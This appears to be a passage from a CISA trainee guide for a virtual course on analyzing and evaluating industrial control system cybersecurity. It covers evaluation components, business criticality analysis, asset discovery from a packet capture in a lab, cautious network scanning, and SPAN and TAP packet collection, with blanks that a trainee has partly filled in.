401V Trainee Guide

Disclaimer
This presentation is intended for informational and discussion purposes only.

The U.S. Department of Homeland Security (DHS) does not provide any warranties of any kind
regarding this information. In no event shall the United States Government or its contractors or
subcontractors be liable for any damages, including but not limited to, direct, indirect, special, or
consequential damages, arising out of, resulting from, or in any way connected with this
information, whether or not based upon warranty, contract, tort, or otherwise, whether or not
arising out of negligence, and whether or not injury was sustained from, or arose out of the results
of, or reliance upon the information.
The display of the DHS official seal or other DHS visual identities, including the Cybersecurity and
Infrastructure Security Agency (CISA) name or logo shall not be interpreted to provide any person
or organization the authorization to use the official seal, insignia, or other visual identities of the
Department of Homeland Security, including CISA. The DHS seal, insignia, or other visual
identities shall not be used in any manner to imply endorsement of any commercial product or
activity by DHS, CISA or the United States Government. Use of the DHS seal without proper
authorization violates federal law (e.g., 18 U.S.C. §§ 506, 701, 1017), and is against DHS policies
governing usage of its seal.
DHS does not endorse any commercial product or service, including any subjects of
analysis. Any reference to specific commercial products, processes, or services by service mark,
trademark, manufacturer, or otherwise, does not constitute or imply endorsement,
recommendation, or favoring by DHS.
Training personnel do not discriminate on the basis of race, color, religion, national origin, sexual
orientation, physical or mental disability, or gender expression/identity. Nor do they possess
proprietary interest in any product, instrument, device, service, or material discussed in this
course.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
2|Page
Disclaimer .............................................................................................................................................. 2
Course Welcome ................................................................................................................................... 5
Introduction ........................................................................................................................................ 5
Trainee guide ..................................................................................................................................... 6
Cybersecurity plan template ............................................................................................................... 6
Introduction to Netlab video ................................................................................................................ 6
Analysis and Evaluation Overview ......................................................................................................... 7
Assessment vs. analysis and evaluation ............................................................................................ 8
Changing the culture .......................................................................................................................... 9
Components of an ICS evaluation .................................................................................................... 10
Step 1 – Analyze Business Purpose .................................................................................................... 16
Step 2 – Identify Assets ....................................................................................................................... 22
Identifying assets within ICS networks.............................................................................................. 23
Asset discovery activity .................................................................................................................... 25
Asset discovery demonstration notes: .............................................................................................. 31
Asset inventory prioritization............................................................................................................. 31
Asset inventory prioritization exercise............................................................................................... 31
Asset inventory recap ....................................................................................................................... 33
Step 3 – Determine ICS Connectivity ................................................................................................... 35
Packets and protocols ...................................................................................................................... 36
Packets and protocols demonstration using Windump notes: ........................................................... 40
Packets and protocols activity #1 ..................................................................................................... 40
Packets and protocols demonstration using Wireshark: ................................................................... 42
Packets and protocols activity #2 ..................................................................................................... 43
Discover undesired activity demonstration: ...................................................................................... 45
Network segmentation demonstration .............................................................................................. 46
Network segmentation exercise........................................................................................................ 53
Network segmentation exercise recap .............................................................................................. 58
Packets, protocols, and segmentation recap .................................................................................... 58
Evaluate network monitoring capabilities .......................................................................................... 61
Network IDS monitoring demonstration ............................................................................................ 65
Detection and monitoring.................................................................................................................. 66
Logging and monitoring exercise ...................................................................................................... 69
Wazuh demonstration ...................................................................................................................... 69
Incident response ............................................................................................................................. 70
Incident response exercise ............................................................................................................... 71
Detection and monitoring recap ........................................................................................................ 72
Wireless in ICS environments .......................................................................................................... 73
3|Page
Wireless threats ............................................................................................................................... 79
ZigBee attacks ................................................................................................................................. 86
RF capture tools ............................................................................................................................... 90
Mobile analyzers .............................................................................................................................. 98
Texas Instruments packet sniffing instructions ................................................................................. 98
Wireless packet analysis - ZigBee .................................................................................................... 99
Wireshark packet analysis - Wi-Fi ...................................................................................................105
Wireless Recap ...............................................................................................................................108
Step 4 – Determine ICS Dependencies ............................................................................................. 110
Determine ICS dependencies..........................................................................................................111
Dependencies Exercises 1 and 2 ....................................................................................................118
Dependencies Recap ......................................................................................................................119
Step 5 – Assess Risk to Business...................................................................................................... 120
Threats to ICS .................................................................................................................................121
Operations security (OPSEC)..........................................................................................................125
Open-source intelligence (OSINT)...................................................................................................128
Physical OPSEC .............................................................................................................................130
Hawaii Emergency Management Agency OPSEC Exercise ............................................................130
Threats, vulnerabilities, risk .............................................................................................................131
OPSEC, OSINT recap .....................................................................................................................132
Evaluate adversarial risk .................................................................................................................134
Phishing exercise ............................................................................................................................135
Adversarial tactics and techniques ..................................................................................................147
Host discovery exercise ..................................................................................................................152
Adversarial tactics and techniques (continued)................................................................................160
Adversarial risk recap ......................................................................................................................164
Assess supply risk...........................................................................................................................165
Supply chain exercise .....................................................................................................................168
Third-party access...........................................................................................................................172
Third-party exercise questions ........................................................................................................174
Supply chain recap ..........................................................................................................................175
Step 6 – Determine Critical Risk ........................................................................................................ 176
Step 7 – Recommend Actions............................................................................................................ 185
Step 8 – Monitor and Reassess ......................................................................................................... 189
Appendix A. Content References ....................................................................................................... 193
Appendix B: Dear Island Treatment Plant Wastewater Collection and Treatment .............................. 194
Appendix C: TCP Ports used by PLC’s (Programmable Logic Controllers) and HMI/OIT’s ................ 196
4|Page
Course Welcome
Introduction
The purpose of this course is to provide training on analyzing, evaluating, and documenting the
cybersecurity posture of an ICS system for internal and/or external recommended changes.
Specifically, the course will utilize a repeatable process to analyze cybersecurity weaknesses and
threats, evaluate and map findings, and document potential mitigations. Trainees will also be able to
download a template that can be used for evaluations at their workplace.
During this course, trainees will gain real-world experience in analyzing ICS cyber-weaknesses and
threats, documenting mitigation possibilities, and providing ongoing resolutions to strengthen the
cybersecurity posture of an evaluated ICS system environment.
Learning objectives
At the end of this course, trainees will be able to:
1. Discuss components of an ICS evaluation
Identify assets within ICS networks
Determine ICS connectivity
Evaluate network monitoring capabilities
Discuss the use of Wireless in ICS environments
Determine ICS dependencies
Evaluate risk using OSINT and OPSEC methods
Evaluate adversarial risk
Assess supply risk
Evaluate risk management and mitigation approaches
Course requirements
CISA encourages active and full participation in this course. However, we also realize motivations for
completing the course may vary. Ultimately, the level at which you choose to participate is completely
up to you, the trainee. However, if you wish to earn Continuing Education Units (CEU) that are part of
this course, then meeting all the requirements will be important.
Sessions
This course contains twelve sessions. Each session contains multiple videos and activities that are
expected to take between 20 minutes to 1 hour each to complete. If a trainee wishes to earn CEUs, fast
forwarding through videos is prohibited.
Video completion is required to progress through the course. This means trainees must complete video
1 before video 2 will become available, etc.
Can I still attend a live event? Registrants of this virtual training are eligible to attend the live
(classroom) version of this course whether or not they complete all sessions.
Instructional/technical support
If you have questions related to the course content or require technical support, contact one of our
instructional support staff at nhs-training@inl.gov.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
5|Page
Continuing education units
Our organization is accredited by the International Association for Continuing Education and Training
(IACET) and is accredited to issue IACET Continuing Education Units (CEUs).
Our organization is authorized by IACET to offer
1.3 CEUs. This number is based on 13 student
engaged contact hours.
At the conclusion of this course, trainees will
receive a certificate of completion which can be
used to provide evidence of completion of
continuing education requirements.
NOTE: CEUs will not be given for partial
completion of this course.
Trainee guide
This guide has fill-in-the-blank activities that will help trainees get the most out of the course. We
recommend downloading and completing the activities as trainees navigate through each video
within each session. Trainees may print this document or use the PDF version to electronically fill in
the blanks. This guide is for trainee benefit only and completion is not a requirement for the course.
Cybersecurity plan template

One encouragement from our instructors throughout this training is the importance of having a
cybersecurity plan so if/when something happens, you have a plan to address it. As such, we have
provided an example cybersecurity plan template for you download and use when creating/updating
your own plan.
Introduction to Netlab video

Some of the activities contained in this course require the use of an external website https://ics-
labs.inl.gov. Watch the video contained in the Welcome session to ensure you are familiar with the
process for registering for these activities.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
6|Page
Analysis and
Evaluation Overview
Definitions, culture, and components of an
ICS analysis and evaluation
TRAINEE GUIDE
Outcomes
In this overview, trainees will be able to discuss the components of an ICS evaluation.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
7|Page
Virtual ICS Cybersecurity Analysis
and Evaluation Training - 401V
Assessment vs. analysis and evaluation
Assessment Analysis & Evaluation
 _________________________________
Generally P2P activity  _________________________________
Ongoing over time activity
_________________________________ _________________________________
 _________________________________
Compliance against(internal and external) stanadards  _________________________________
Not compliance focused - incorporated as required
_________________________________ _________________________________
 _________________________________
Diagnostic in nature, scored against a process  _________________________________
Judgement in nature measured against product value
_________________________________ _________________________________
 _________________________________
Measurement - absolute per standard  _________________________________
Measurement- comparative against business
_________________________________ _________________________________
objectives
 _________________________________
Security posture re-assessed at long term intervals  _________________________________
Security posture re-assessed at continuosly
_________________________________ _________________________________
Why establish an ICS evaluation program?

According to a statement made by John Fryer, Senior Director of Product Management & Marketing
at Stratus Technologies, the number of connected devices by 2020 will range from 50 billion to more
than 200 billion – “Many of these devices will be industrial machines – from production line equipment
to pipeline pumps and monitors – transforming manufacturing and process automation.”
Many evaluation programs/systems are based on compliance. The process taught in this class is meant
to be a business enabler and is not focused on regulatory compliance.
Having said that, this course incorporates regulatory considerations in evaluation phases, and this
focus is designed to help an organization understand its vulnerabilities and risks and show how
organizations can provide recommendations to continually improve cybersecurity posture.
IMPORTANT: No
organization will
ever be ‘completely’
secure. However, if
the only reason an
organization
evaluates its own
systems is based
on regulation, they
are more vulnerable
than secure.
Creating an ICS
cybersecurity self-
evaluation process
is critical to
sustainable
practice.
______________________________________________________________
Evaulations helps the buiness understand their vulnerablities and risks and how to provide recommendations to
______________________________________________________________
continually improve in cybersecuity posture.
______________________________________________________________
______________________________________________________________
8|Page
Changing the culture
Current culture Automation World Survey – 2017
 ‘Fewer than 10% of companies have combined IT and OT departments
 24% say IT and OT departments have no to little interaction
 61% report no cross-training being performed between IT and OT
Future “culture” bridge the IT and OT gap
 Form special projects
 Increased connectivity lends to business projects needing both IT and OT
 Plant/system data are needed to drive overall business intelligence
 Seek to create partnerships between IT and OT
 Help each other by understanding/training on uniqueness between IT and OT
 Seek to understand before seeking to be understood (build process connections)
 Embrace convergence between IT and OT
 IOT protocols - span IT and OT worlds via IOT allowing communication (ex: MQTT)
 IT and OT must tackle intersecting initiatives between physical and digital worlds
_____________________________________________________
_____________________________________________________
_____________________________________________________
_____________________________________________________
_____________________________________________________
9
|Page
Learning Objective 1
Components of an ICS evaluation
ICS evaluation components
 ____________________________________________________________________________
1.Establish an ICS evaluation methodology
 ____________________________________________________________________________
2.Determing evaluation entry qualifiers
 ____________________________________________________________________________
3. Establish roles / team to perform evaulation
 ____________________________________________________________________________
4. Prepare evaluation to cover entire SDLC
 ____________________________________________________________________________
5.Establish expected outcomes and products of evaluation process
 ____________________________________________________________________________
6.Estalish issues and findings tracking mechanish, and final report to mechanism to closure the findings.
ICS evaluation methodology
Reference for 401 course evaluation process: HANDBOOK for SELF-ASSESSING SECURITY
VULNERABILITIES & RISKs of INDUSTRIAL CONTROL SYSTEMS on DOD INSTALLATIONS, 2012
_____________________________________________________
This methodology is really is rest learning for objectivies.
_____________________________________________________
Qualifiers - is like we make sure we evaluate correctly.
_____________________________________________________
Example who is leadership management, Who owners ICS Assests. What is business policies and procedures
_____________________________________________________
what is technical procedures,policies like Change management Plans.
_____________________________________________________
Technical evaluations,like existing infrastructure, disaster recovery,identifications and authentications,etc Once the qualifiers is setup up then we need
10 | P a g e
once we establish the qualifiers then we need to move to potentially structures by team with
participant roles
Evaluation entry qualifiers/organizational and technical
Many of these qualifiers come from the Defense-in-Depth Strategy Elements found in CISA’s document
NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf. That document broke up elements into
Organizational and Technical Qualifiers an evaluator should use when the goal is to fully complete an
evaluation.
Evaluating an ICS environment is not an exact science. As such, the idea of having qualifiers to bind
your evaluation topics and resulting artifacts will vary by the business/industry/sector. The table below
is provided as an example and is not meant to be prescriptive.
Participant roles
The training roles may not match your organizational roles. They are designed to align the course
material and the capstone exercise. One person can perform multiple roles.
 _____________________________
Evaluation Team Lead or Alternate Team Lead
 _____________________________
OT Analyst/Cyber Physical Security
 _____________________________
OT Analyst/Network Connectivity
Wireless analyst
 _____________________________
 _____________________________
Once who perform best in offensive cyber-
Adversarial risk Analyst

 _____________________________
 _____________________________
Reporting / Documentation Chief
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
11 | P a g e
Systems development life cycle (SDLC)
The entire goal of this evaluation process is to provide recommendations to an organization for
improvement in ICS cybersecurity posture. As such, the evaluation process will review gaps in security
across the SDLC. Recommendations for including security into the SDLC include: 1) initiation, 2)
development/acquisition, 3) implementation/assessment, 4) operation/maintenance, and 5) disposal.
Establish expected outcomes and products

Qualitative vs. quantitative
Reporting Outcomes: Considering the evaluation process is meant to result in recommendations, it is
critical to ensure these recommendations are:
 Standardized – you would not want to do 3 different evaluations and have the same findings
without a standardized approach to risk mitigation
 Practical – your recommendations should balance the complexity of the solution as well as the
cost-effectiveness of the solution as part of the consideration
 Reliable/Repeatable – the results of your recommendations, when tested should perform in a
reliable state. It is a good idea to recommend tested solutions vs. just hypothetical solutions that
could cause more harm than help. A simpler word for this might be Repeatable results each
time.
 Valid – It is critical you ensure you can validate your claim when making a recommendation.
Seek outside help and do not just rely on textual recommendations. Consider suggesting to
businesses they also validate their internal recommendations before implementing a solution.
______________________________________________________________
In cybersecurity & ICS Systems in general we need to make sure the understand the recommendations from NIST 800. we need to consider from the
______________________________________________________________
cybersecurity that spams into our system from the phase 1 Intiations as show in the picture above in SDLC, intiations to direct displosal.
______________________________________________________________
______________________________________________________________
12 | P a g e
Evaluation products:
 Issues and findings report  Update or establish cybersecurity policy
 Final report and procedures
Issues and findings

Issue: ____________________________________________________________________________
Finding: __________________________________________________________________________
__________________________________________________________________________________
Issues and findings tracking mechanism
NOTE: An example report can be downloaded from this course.
Document all issues in a report. Create columns in a spreadsheet similar to the following examples,
based on your business risk management requirement(s).
Control NIST 800-53Control Family Issue Discovery Risk
Remote access can

grant malicious Remote access can
individuals grant malicious
Network - Remote
AC-17(3) System has multiple remote access options persistence and individuals persistence
Access ease of access to and ease of access to
company company resources.
resources.
Lack of uniform time

source can create
No authoritative inefficiencies when
Logs are not kept long enough or data within them is
AU-11 Detection - Logs time source within performing forensic
overwritten too fast to be of value system. analysis of logs, and
may cause other time-
related issues.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
13 | P a g e
Final evaluation report
The executive summary should include:
 Date, purpose, scope
 Initial or follow-up
 Bound evaluation (organization-wide, business/mission specific, system specific)
 List findings and recommended actions
 Describe risk
The body of the report should include:
 Describe, in full, the purpose of the evaluation (what answers are being sought)
 Identify assumptions and constraints
 Provide a rationale for any risk-related decisions during the evaluation (risk recommendation)
process
 Describe uncertainties with evaluation process
 Describe specific business, organization(s), systems evaluated
 Summarize evaluation results
 Identify time frame of evaluation
 List critical issues that present risk based on adversarial threat
The appendices should include:
 References
 Team or individuals conducting the evaluation
 Evaluation details to include issues and findings report; other supporting evidence
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
14 | P a g e
ICS cybersecurity policy and procedures
ICS uniqueness:
 ICS/supervisory control and data
acquisition (SCADA) lack standard
security guidelines, not uniform like IT
systems
 Companies may need to
create/maintain system-specific
ICS cybersecurity practices
 These business practices should be
documented, enforced, and updated
regularly
 Establishing policy, procedure, and/or
process
 Evaluation best not performed as a
‘one-off’
 ICS cybersecurity success requires establishing/maintaining ICS cybersecurity policy
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
15 | P a g e
Step 1 – Analyze
Business Purpose
Business criticality, purpose, and function
TRAINEE GUIDE
Outcomes
Now that we know the important components of an ICS cybersecurity evaluation, let’s discuss, each
step within the process, beginning with Step 1, Analyze Business Purpose. In this session, trainees will
learn to analyze business purpose.
16 | P a g e
Step 1- Analyze Business Purpose
Criticality analysis
 Prioritization of business functions based on:
 _________________________________________________________________________
____________________________________________
 _________________________________________________________________________
____________________________________________
 ______________________________________________________________________
_______________________________________________
 ____________________________________________________________________________
_________________________________________
 ______________________________________________________________________
_______________________________________________
 Priority to business is based on:
 _________________________________________________________________________
 _________________________________________________________________________
 Sample criticality analysis process (NISTIR 8179)1

 Originates from Failure Mode Effects and Criticality Analysis (FMECA)
 First mention – NIST 800-53v4 (April 2013); now in several NIST special publications
 Model flows through design, acquisition, implementation, disposal of projects and systems
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
17 | P a g e
Business – critical priority analysis
The five main criticality analysis processes are:
A. Define criticality analysis procedure
B. Conduct program level criticality analysis
C. Conduct system/subsystem level criticality analysis
D. Conduct component/subcomponent level criticality analysis
E. Conduct detailed review of criticality for processes B, C, and D
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
18 | P a g e
 _____________________________________________________
 _____________________________________________________
 _____________________________________________________
 Obtain or define program goals and objectives, assumptions, and

constraints
 Obtain, design, or document a high-level process for completing
program objectives
 Identify interactions, intersections, connections, and program
dependencies
 Define how program will operate normally and how will it operate if
impacted by an adverse operating state (an operating state that is
not normal)
 Assign baseline criticality levels to workflow paths based on
gathered information
 _____________________________________________________
 _____________________________________________________
 _____________________________________________________
 _____________________________________________________
 _____________________________________________________
 Scope/frame the analysis to a specific system or subsystem

 Identify system functionalities, capabilities, and pathways needed
to fulfill functional requirements
 Match components and subcomponents to the identified system
functionalities, capabilities, and pathways
 Define normal operating conditions and those conditions that
system/subsystem will be operating sub-optimally, referred to as
adverse operating states
 Assign baseline criticality to the components and subcomponents
identified earlier
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
19 | P a g e
 Identify and map interactions, intersections, connections, and
dependencies across:
o Program
o System/Subsystem
o Component/Subcomponent
 Identify controls protecting the system to be used
 Review impact of operating states
 Validate, apply, and trace any available risk information
through interactions, intersections, connections, and
dependencies.
Perfume Specialty Chemical Scenario

Identify business purpose and functions
 Major Business Purpose: Create ‘perfume’
 Major business ‘programs’ listed:
 Perfume manufacturing/blending
 Perfume business/sales
 Perfume distribution
 Perfume feedback storage
 Draw connecting lines representing process flow
 Perfume manufacturing/blending
 Perfume business/sales is connected upwards and downward
 Perfume has both a distribution and storage component
 Business criticality provides evaluation guidance
 Sets context for priority in interviews
 Sets context for priority in risk mitigation
 Sets context for priority in evaluation resources
 Based on the example to the right:
 Which is the most critical function?
 What are the major systems in the diagram?
 What are the subsystems in the diagram?
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
20 | P a g e
 Assign a priority for each function:
 Ranked 1 (least important) to 10 (most
important)
 If I lose this function:
 What happens to business purpose?
 What happens to other functions?
 What is the overall business impact?
 Criticality map can be used to:
 Identify true ‘impact’ of critical risk
 Establish priority order for which system(s) to evaluate
 Establish priorities for risk mitigation and resource allocation
 Establish priorities for process modifications and change management
Change management
 Does our company have a Cybersecurity Plan?
 Does our company have an ICS Cybersecurity Plan?
 What policy, process, and/or procedures do I need to consult, modify, or create to protect
business critical functions?
NOTE: Download the ‘Cybersecurity Plan’ available in the introduction section of this course for a
full listing of options for building a Cybersecurity Plan and/or an ICS Cybersecurity Plan
Review
 _________________________________________________________________________
 _________________________________________________________________________
 _________________________________________________________________________
 _________________________________________________________________________
 _________________________________________________________________________
 _________________________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
21 | P a g e
Step 2 – Identify
Assets
Asset discovery and prioritization
TRAINEE GUIDE
Outcomes
Once critical areas of your business and your evaluations focus, you will move into the second step of
your evaluation, Identify Assets. This step is critical to your evaluation because you cannot defend what
you do not know. In this session, trainees will learn to identify assets within ICS networks.
22 | P a g e
Identifying assets within ICS networks
23 | P a g e
Asset Inventory
It is accurate and complete, right?
 Asset inventory is vital, but many times elusive
 You cannot defend what you don’t know
“Understanding and solving the asset inventory and device visibility problem
is critical in managing a business’ security program.”
– Implementation guide to ICS
Why is your asset inventory challenging?

 __________________________________________________________________________
 ________________________________ from multiple vendors, lack of up-to-date diagrams,
unique industry and application-specific protocols (some of which are not IP-based), and the
difficulty in conducting physical inventories in dispersed or hostile environments compound
these challenges.
True or False?
 Never scan a live ICS network? No one likes to scan live networks
________ because this can, and has, caused
outages.
 Always scan your ICS network We have never caused an unacceptable

– you can’t defend what you ________
impact to operations.
don’t understand?
– Digital Bond*
We should land somewhere in between.

 The way to prevent an ________ Be VERY cautious when scanning a live
unacceptable impact is to ICS. Use passive tools when possible,
prepare correctly? and when you do scan be educated on
how you scan.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
24 | P a g e
What does cautious scanning mean?
 When possible, use a development system (sandbox) to avoid scanning a live system
 Do not flood the network with multiple scans
 Talk to vendors, consult manuals etc., to identify devices that may be scan-sensitive
 Pick an optimal time to test (e.g., low or zero traffic hours)
 Outage, maintenance cycle, etc.
 Identify disaster recovery, especially to critical assets
 If it is not OK for a device to go down, avoid scanning that device or have recovery options
identified.
 Run tools such as Nmap with timing options to avoid heavy network traffic
 Use NSE scripts or Nmap scripts that are gentle to the ICS environment. These scripts send
expected or legitimate commands to the device to avoid unexpected responses.
 Use privileged user scans – more friendly to systems
 Create a scanning account and disable when complete
 Communicate – ensure everyone who needs to know you are scanning, knows and avoids an
RGE (resume generating event)
Asset discovery activity

This exercise will cover how to use a PCAP to discover the assets of a network.
NOTE: This exercise is done virtually using Netlabs. Before completing this exercise,
view the “Introduction to Netlab” video located in this course.
1. Open https://ics-labs.inl.gov in a new window/tab to avoid closing your VLP
session.
2. Login and schedule a reservation for the Learning Objective 2: Identify Assets
Exercise.
3. Enter your reservation.
4. Follow the instructions listed below.
Lab Settings
The information in the table below lists the basics of the environment.
Virtual Machine IP Address Account (if needed) Password (if needed)
Kali Auto Logged in - root Auto Logged in - toor
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
25 | P a g e
1. To begin the exercise, click the Kali Linux Host in the diagram or on the tab listed at the top.
2. You are welcome to use any other tool on the supplied Kali host (GrassMarlin, Zenmap,
Wireshark etc. – the files in the directory listed below are your only inputs). This guide will walk
you through how to use GrassMarlin and Wireshark.
3. Open the GrassMarlin application or any other tool that you would prefer.
NOTE: View an example of how to complete this exercise using the GrassMarlin tool on page
26.
4. Access the PCAP from /Desktop/pcap_file/AssetInventory/
5. The file name is acme_pcs_traffic.pcap
GrassMarlin will take all the conversations from the PCAP and present them in a graphic to help
you identify the assets and the IP address of each.
6. Use the information from GrassMarlin to discover what IP addresses exist on the network. Fill in
the missing IP’s on the network map on the following page
7. Here is a list of known hardware supplied by your fellow field technician
a. 3 Sony Cameras
b. Allen Bradley HMI and PLC
c. Siemens HMI and PLC
d. GE HMI and PLC
e. Two Electrol Meters
f. The I/O server (Windows OS that communicates via Modbus and DNP3)
g. Juniper Firewall
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
26 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
27 | P a g e
192.168.10.100
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
28 | P a g e
Asset inventory exercise example
1. Open the GrassMarlin application (inside the Kali VM)
2. From the FILE menu select Import Files
3. The import files dialog will pop up. Select Add Files
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
29 | P a g e
4. The Add Files dialog will pop up
5. Select the PCAP file

acme_pcs_traffic.pcap from
the pcap_files directory
acme_pcs_traffic.pcap
6. Select Open
7. From the Import dialog

select Import Selected
8. Once the import is complete

Close the Import dialog
window.
9. Select the Logical Graph

tab to view the network
layout.
10. Use this information to fill in the PCS network diagram.
NOTE: This example is

from one of our
classroom networks. It
can be helpful to click-
and-drag common
network IP’s into
groups. YOUR DATA
WILL NOT MATCH
THIS NETWORK.
End your reservation and return to the learning portal to continue with the next video.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
30 | P a g e
Asset discovery demonstration
Take any notes from the online demonstration:
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
Asset inventory prioritization

Do we need to do anything else to confirm our asset inventory?
 What about non-network connected devices?
 How do we find these?
 __________________
 __________________
 __________________
 __________________
Asset inventory prioritization exercise

Resources are prioritized based on the classification, criticality, and organizational
value. Use the ICS network map provided on the next page to complete this exercise.
1. Circle a device or devices with RED, YELLOW or GREEN to indicate prioritization
with RED being the highest and GREEN the lowest. You may also instead mark
each device with one of the following:
a. H Highest priority
b. M Medium priority
c. L Lower priority
2. To help prioritize, ask the question, if we lose that (server, HMI, switch) what impact will that
have? Document your results on the map and in the space below.
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
31 | P a g e
Return to
the
learning
portal and
continue
with the
next video.
32 | P a g e
Asset inventory recap
Evaluation questions
During this step, you can ask the following questions to identify any gaps.
 Are resources prioritized based on their classification, criticality, and business value?
 Are physical devices and systems within the organization inventoried?
 Are software platforms and applications within the organizations inventoried?
 Does the organization check that the version of all acquired applications software being used
are still supported by their vendors?
 Are unsupported software versions available? Is the system updated or patched to the most
current version?
 Is a baseline configuration of IT/OT systems created and maintained?
 Does the organization maintain asset inventory of all systems connected to the network?
 Is physical access to assets managed and protected?
 Is the physical environment monitored to detect potential cybersecurity events?
Cybersecurity plan mapping
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
33 | P a g e
Common issues/findings
 System Diagrams & documentation is missing/incomplete.
 No change management/ configuration control
 Poor/Non-existent boundary controls
 No separate test environment to test changes outside of the operational environment.
 Unauthorized parties have access to sensitive/critical devices.
 No password policy
 No process governing the implementation of remote access
 Remote Access does not use multi-factor authentication.
 Control System resides on same system/network as Enterprise/IT network.
 Laptops can be used across domains
 No notification of user/employee change
 No mobile device policy
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
34 | P a g e
Step 3 – Determine
ICS Connectivity
Network segmentation, network monitoring
and detection, incident response, and wireless
TRAINEE GUIDE
Outcomes
In this session, trainees will learn to determine how/if the assets the identified in the previous session
are connected appropriately. This brings us to Step 3 in the process, Determine ICS Connectivity.
35 | P a g e
ICS connectivity
Packets/Protocols: What are the protocols normally taking place in the operations? We will cover this
along with viewing what they look like by learning how to capture packets, taking a closer look at the
protocols in those captured packets to baseline what is normal, and learning what port numbers
commonly appear for protocols in ICS captured packets. We will also provide a hands-on demo which
includes tools to explore these concepts.
Network Segmentation: Examining captured packets from an existing network can help reveal if other
networks exist. How is the network designed? Is it a single network or is it divided into several? Why
divide it into more than one network? Another hands-on demo will encourage you to consider ways to
further segment an existing design and rebuild it into your own network.
Critical Data Points: Significant connections for mission success. What data paths traverse the
network segments that represent critical data? Are these fragile links well understood? Are they
documented? Which personnel are aware of them? Is there a plan to recover these paths if something
goes wrong? These are some example concerns to consider. There may not be a perfect answer to
each, but simply bringing the concerns to light, sets in motion the steps needed to help an organization
become ready.
Packets and protocols

Packets
If we are going to look close at protocols, we will need packets to examine. Packets are pieces of data
that represent the network traffic. How does one collect these packets? There are two very common
approaches for collecting packets:
 Switched Port Analyzer (SPAN) is a method used on
Managed Network Switches. Since switches are left in
networks, this is a feature that can be utilized temporarily, or
sometimes permanently.
 Network Test Access Points (TAPs) are devices that
passively relay. These are much simpler devices, but they can be
strategically put in specific places. TAPs can be useful in places
where devices are not meeting at a common network switch.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
36 | P a g e
SPAN ports
SPAN is very typical method to collect packets. Ask the IT Admin of a core network switch to
temporarily enable a mirroring span port. This port will transmit a copy of every packet traversing the
other ports of this switch. Depending on the switch, you can selectively choose which source ports to
use, or even which specific VLANs to use. You do not
always have to choose every port. The more specific the
selection, the more relevant packets you will collect out
from the SPAN port.
NIC
Limitations:
 Oversubscription if sending data from
Advantages: multiple ports
 Packets can be dropped if ports are
 Multiple SPAN ports on most managed
oversubscribed
switches
 Latency – can distort real-time
 Gain visibility into what is on the LAN and
communications
WAN  Captures not admissible in court
 Inexpensive  Not passive – can degrade performance
 Flexible  Could be inadvertently misconfigured
 Remotely configurable
 Can be hacked if attacker gains access to
 Capture intra-switch traffic
switch
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
37 | P a g e
TAP/transparent bridge
Sometimes control systems are not connected to a common switch. In such cases, there are methods
to get a computer in-line between two devices. Set up a network bridge and operate as a transparent
device between them. Capture the packets at the bridge interface, which is a software interface inside
the computer, representing the two real interfaces. Another approach designed around the same
concept is using a network TAP device. These can be more costly, and optionally left in-line.
Advantages: Limitations:
 Packets not dropped, no oversubscription  Must go in-line – installation requires
issue network downtime
 Doesn’t alter time relationships  Added cost
 Captures ARE admissible in court  Downtime to install and move
 Zero configuration  Power failure – ensure fully passive TAP
 Fail open if there is an issue  Fully passive is only possible on optical
 Secure - not easily hacked connections and on copper connections
 No added latency or altered timings 10/100 Mbit
 Includes network errors in addition to good
frames/packets
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
38 | P a g e
SPAN and TAP placement
 What do you want to secure?
 Which assets are critical?
 What network locations are high risk?
 Is the Internet a security concern?
 What data do you need to see?
 Who has access to critical assets?
 What SCADA/ICS devices are present?
 Are policy violations important?
Virtual Machine
In some cases you may be faced with a virtual machine. In this case neither a SPAN nor a TAP may be
helpful.
A software switch between the virtual machines and the real network hardware can be configured to
bridge the packets across the real interface. Dump the packets at this real interface.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
39 | P a g e
Protocols
Once packets are captured from the Control System network, it will
be time to examine them.
What are we looking for?
Many networks use Ethernet for the lower-level base. Other
network types exist. These are lower-level examples, which can all
be represented with packets.
Above the lower layers are common protocols that can ride on top of
them. These protocols are often used to wrap and deliver the protocols
that will also be placed onto these.
At last, more interesting protocols in the upper layers. These are
where we will find control system protocols. They are carried to us
by the example middle layers, and those layers are carried to us
by the lower layers. Each of the layers described here can be
viewed in packets, all sandwiched together. We will use tools to
help us visualize this layering.
Packets and protocols demonstration using Windump:

Take any notes from the online demonstration: ____________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
Packets and protocols activity #1

